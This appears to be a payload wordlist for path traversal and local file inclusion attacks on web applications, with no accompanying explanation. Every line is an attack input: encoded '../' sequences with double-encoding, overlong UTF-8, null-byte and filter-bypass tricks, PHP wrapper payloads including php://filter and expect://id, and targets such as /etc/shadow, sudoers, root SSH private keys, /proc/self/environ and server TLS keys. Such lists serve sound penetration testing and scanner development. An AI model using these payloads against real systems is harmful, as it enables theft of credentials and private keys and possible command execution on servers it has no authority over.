../../etc/passwd
..\\..\\..\\windows\\win.ini
../../../etc/shadow
../../../../etc/hosts
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
..%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%252e%252e%252fetc%252fpasswd
..%25252f..%25252f..%25252fetc%25252fpasswd
../../../etc/passwd%00
../../../etc/passwd%00.html
../../../etc/passwd\0.php
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://input
php://filter/convert.base64-encode/resource=/etc/passwd
file:///etc/passwd
expect://id
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..;/..;/..;/etc/passwd
..%252f..%252f..%252fetc%252fshadow
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..\\..\\..\\..\\boot.ini
..%5c..%5c..%5c..%5cboot.ini
..%252f..%252f..%252f..%252fetc%252fpasswd
..%2525%32%66..%2525%32%66..%2525%32%66etc%2525%32%66passwd
..%c0%ae%c0%ae%c0%af..%c0%ae%c0%ae%c0%af..%c0%ae%c0%ae%c0%afetc%c0%aepasswd
..;/..;/..;/windows/system32/drivers/etc/hosts
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
..%252f..%252f..%252f..%252fwindows%252fwin.ini
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afhosts
....//....//....//....//etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%25252f..%25252f..%25252f..%25252fetc%25252fpasswd
..%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
....\/....\/....\/....\/etc/passwd
..//..//..//etc/passwd
..\\..\\..\\app_data\\config.ini
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%aepasswd
../etc/passwd
../etc/shadow
../etc/hosts
../etc/issue
../etc/group
../etc/hostname
../etc/resolv.conf
../etc/shells
../etc/services
../etc/motd
../etc/crontab
../etc/sudoers
../root/.bash_history
../root/.ssh/id_rsa
../var/log/auth.log
../var/log/syslog
../var/log/apache2/access.log
../var/www/html/config.php
../var/www/html/.env-example
../proc/self/environ
../proc/self/cmdline
../proc/self/fd/0
../proc/version
../../etc/ssl/private/ssl-cert-snakeoil.key
../../etc/ssh/sshd_config
../../etc/nginx/nginx.conf
../../etc/apache2/apache2.conf
../../var/log/mysql/error.log
../../home/user/.ssh/authorized_keys
../../home/user/.bashrc
